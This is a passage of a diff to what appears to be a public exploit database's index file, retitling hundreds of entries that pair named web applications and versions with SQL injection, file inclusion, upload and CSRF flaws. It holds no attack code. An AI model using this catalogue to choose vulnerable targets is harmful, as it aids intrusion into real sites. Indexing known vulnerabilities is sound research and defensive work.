+3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 @@ -17922,7 +17924,7 @@ id,file,description,date,author,platform,type,port 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3134,platforms/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php id' Parameter SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - 'mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 @@ -18383,7 +18385,7 @@ id,file,description,date,author,platform,type,port 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php news_id' SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php search' SQL Injection",2007-05-09,Silentz,php,webapps,0 -3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 +3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 @@ -18725,7 +18727,7 @@ id,file,description,date,author,platform,type,port 4489,platforms/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0 4490,platforms/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0 -4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 +4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 @@ -18733,7 +18735,7 @@ id,file,description,date,author,platform,type,port 4497,platforms/php/webapps/4497.txt,"Joomla! Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0 4499,platforms/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 -4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 +4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - 'galerie.php' SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 @@ -18742,7 +18744,7 @@ id,file,description,date,author,platform,type,port 4508,platforms/php/webapps/4508.txt,"Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 4509,platforms/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection",2007-10-10,ShAnKaR,php,webapps,0 4510,platforms/php/webapps/4510.txt,"Drupal 5.2 - PHP Zend Hash Exploitation Vector",2007-10-10,ShAnKaR,php,webapps,0 -4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 - category.php SQL Injection",2007-10-10,ka0x,php,webapps,0 +4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 - 'category.php' SQL Injection",2007-10-10,ka0x,php,webapps,0 4512,platforms/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 @@ -20385,10 +20387,10 @@ id,file,description,date,author,platform,type,port 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,php,webapps,0 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 -6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 +6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API - 'Data Feed File' Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 -6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD",2008-10-08,GoLd_M,php,webapps,0 +6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / Remote File Disclosure",2008-10-08,GoLd_M,php,webapps,0 6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps,0 6707,platforms/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection",2008-10-09,beford,php,webapps,0 @@ -21194,7 +21196,7 @@ id,file,description,date,author,platform,type,port 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0 -7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 +7741,platforms/asp/webapps/7741.txt,"dMx READ - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 7746,platforms/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 @@ -21452,7 +21454,7 @@ id,file,description,date,author,platform,type,port 8128,platforms/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 -8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 +8132,platforms/asp/webapps/8132.txt,"Access2asp - 'imageLibrar' Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 @@ -23293,12 +23295,12 @@ id,file,description,date,author,platform,type,port 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0 -11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php' 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 +11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS - (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 -11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 +11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,cr4wl3r,php,webapps,0 11657,platforms/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,cr4wl3r,php,webapps,0 @@ -23873,7 +23875,7 @@ id,file,description,date,author,platform,type,port 12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - 'section.php' SQL Injection",2010-05-11,CoBRa_21,php,webapps,0 12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,php,webapps,0 12568,platforms/php/webapps/12568.txt,"Digital College 1.0 - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 -12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 +12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 Adult Site - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,php,webapps,0 @@ -23977,7 +23979,7 @@ id,file,description,date,author,platform,type,port 12707,platforms/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance eCommerce - SQL Injection",2010-05-23,cyberlog,php,webapps,0 12711,platforms/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 -12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 +12712,platforms/php/webapps/12712.txt,"goffgrafix Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0 12714,platforms/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,php,webapps,0 12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,multiple,webapps,0 @@ -24299,7 +24301,7 @@ id,file,description,date,author,platform,type,port 14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14075,platforms/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection (2)",2010-06-27,"Easy Laster",php,webapps,0 -14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload 1.09 - Arbitrary File Upload",2010-06-27,Mr.Benladen,php,webapps,0 +14078,platforms/php/webapps/14078.txt,"Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload",2010-06-27,Mr.Benladen,php,webapps,0 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 14080,platforms/php/webapps/14080.txt,"I-Net MLM Script Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection",2010-06-27,"L0rd CrusAd3r",php,webapps,0 @@ -24313,8 +24315,8 @@ id,file,description,date,author,platform,type,port 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 14103,platforms/multiple/webapps/14103.txt,"Applicure dotDefender 4.01-3 - Persistent Cross-Site Scripting",2010-06-28,EnableSecurity,multiple,webapps,80 14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script - 'docID' SQL Injection",2010-06-29,v3n0m,php,webapps,0 -14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 -14111,platforms/php/webapps/14111.txt,"Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 +14110,platforms/php/webapps/14110.txt,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 +14111,platforms/php/webapps/14111.txt,"Allomani Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps,0 14115,platforms/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,windows,webapps,80 14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP 4.3.x - 'shipkey' SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 @@ -24685,7 +24687,7 @@ id,file,description,date,author,platform,type,port 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps,0 14998,platforms/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0 14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 -15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara 3.1 (Sections Module) - Blind SQL Injection",2010-09-14,_mRkZ_,php,webapps,0 +15004,platforms/php/webapps/15004.pl,"E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection",2010-09-14,_mRkZ_,php,webapps,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps,0 15011,platforms/php/webapps/15011.txt,"PHP microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15014,platforms/php/webapps/15014.txt,"PixelPost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 @@ -24723,7 +24725,7 @@ id,file,description,date,author,platform,type,port 15157,platforms/php/webapps/15157.txt,"Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0 -15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0 +15110,platforms/php/webapps/15110.txt,"E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0 15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS - Directory Traversal",2010-09-26,mr_me,cfm,webapps,0 15121,platforms/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,php,webapps,0 15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection",2010-09-27,Abysssec,asp,webapps,0 @@ -24986,7 +24988,7 @@ id,file,description,date,author,platform,type,port 15681,platforms/asp/webapps/15681.txt,"ASPSiteWare JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15682,platforms/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15684,platforms/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection",2010-12-05,M4g,php,webapps,0 +15684,platforms/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' SQL Injection",2010-12-05,M4g,php,webapps,0 15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -25308,7 +25310,7 @@ id,file,description,date,author,platform,type,port 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3/7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 -16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 +16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - POST Session Fixation",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 @@ -25364,7 +25366,7 @@ id,file,description,date,author,platform,type,port 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0 -17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php' 'id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 +17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 - 'regist.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 - 'index.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - 'index.php' SQL Injection",2011-04-03,keracker,php,webapps,0 @@ -25498,7 +25500,7 @@ id,file,description,date,author,platform,type,port 17402,platforms/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps,0 17403,platforms/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 17404,platforms/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",multiple,webapps,0 -17406,platforms/php/webapps/17406.txt,"Catalog Builder - eCommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 +17406,platforms/php/webapps/17406.txt,"Catalog Builder eCommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)",2011-06-17,Saif,php,webapps,0 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 @@ -25657,7 +25659,7 @@ id,file,description,date,author,platform,type,port 17750,platforms/php/webapps/17750.txt,"WordPress Plugin Advertizer 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17751,platforms/php/webapps/17751.txt,"WordPress Plugin Event Registration 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 -17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0 +17753,platforms/php/webapps/17753.txt,"FileBox File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0 17755,platforms/php/webapps/17755.txt,"WordPress Plugin Crawl Rate Tracker 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17756,platforms/php/webapps/17756.txt,"WordPress Plugin Audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17757,platforms/php/webapps/17757.txt,"WordPress Plugin yolink Search 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 @@ -25753,7 +25755,7 @@ id,file,description,date,author,platform,type,port 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 17944,platforms/php/webapps/17944.txt,"Joomla! Component Time Returns 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 -17947,platforms/php/webapps/17947.rb,"Snortreport - nmap.php and nbtscan.php Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0 +17947,platforms/php/webapps/17947.rb,"Snortreport - 'nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0 17949,platforms/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor (Metasploit)",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 @@ -25806,7 +25808,7 @@ id,file,description,date,author,platform,type,port 18050,platforms/php/webapps/18050.txt,"Joomla! Component HM Community - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 -18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 +18056,platforms/php/webapps/18056.txt,"jbShop e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 18063,platforms/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 @@ -25924,7 +25926,7 @@ id,file,description,date,author,platform,type,port 18352,platforms/php/webapps/18352.txt,"Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 18353,platforms/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 18355,platforms/php/webapps/18355.txt,"WordPress Plugin Count Per Day - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 -18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 +18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,php,webapps,0 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management - Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 @@ -26034,7 